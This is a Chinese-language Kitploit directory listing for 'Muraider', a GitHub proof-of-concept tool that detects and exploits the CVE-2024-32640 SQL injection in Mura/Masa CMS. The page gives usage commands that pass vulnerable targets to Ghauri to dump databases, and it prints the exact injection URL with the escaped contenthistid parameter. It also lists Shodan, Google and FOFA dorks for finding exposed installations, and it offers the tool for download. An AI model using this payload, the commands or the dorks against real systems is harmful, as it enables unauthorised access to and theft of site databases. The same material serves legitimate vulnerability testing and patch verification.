Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32640-SQLI-MuraCMS — CVE-2024-32640 | 自动化SQLi利用PoC | Kitploit
工具/GitHubGitHub/stuub/cve-2024-32640-sqli-muracms
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubstuub/cve-2024-32640-sqli-muracms

CVE-2024-32640-SQLI-MuraCMS

CVE-2024-32640 | 自动化SQLi利用PoC

查看仓库
78122年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Muraider - 自动检测与利用 CVE-2024-32640 \ Mura/Masa CMS 中的 SQL 注入

使用方法

检测:

python3 CVE-2024-32640.py --url https://target.com/

Ghauri 利用(传递 '-g' 或 '--ghauri' 作为参数):

传入任何你想要与 Ghauri 一起使用的参数,遵循其参数列表:

python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

示例

image

Ghauri SQL 注入自动化:

利用我在工具中实现的检测功能,我们可以使用易受攻击的目标在 Ghauri 中进行利用。该脚本自动化了这一过程,将所有需要的目标信息解析到对 Ghauri 的调用中。

image

详细信息

通过将转义序列(%5c)附加到 contenthisid HTML 查询参数值后,我们可以验证目标是否易受此 SQL 注入攻击。

成功利用可能导致未授权访问敏感数据。

URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x

Dorks

Shodan-query: 'Generator: Masa CMS'

Google: "powered by Mura CMS"

FOFA: app="Mura-CMS"

References:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835

下载工具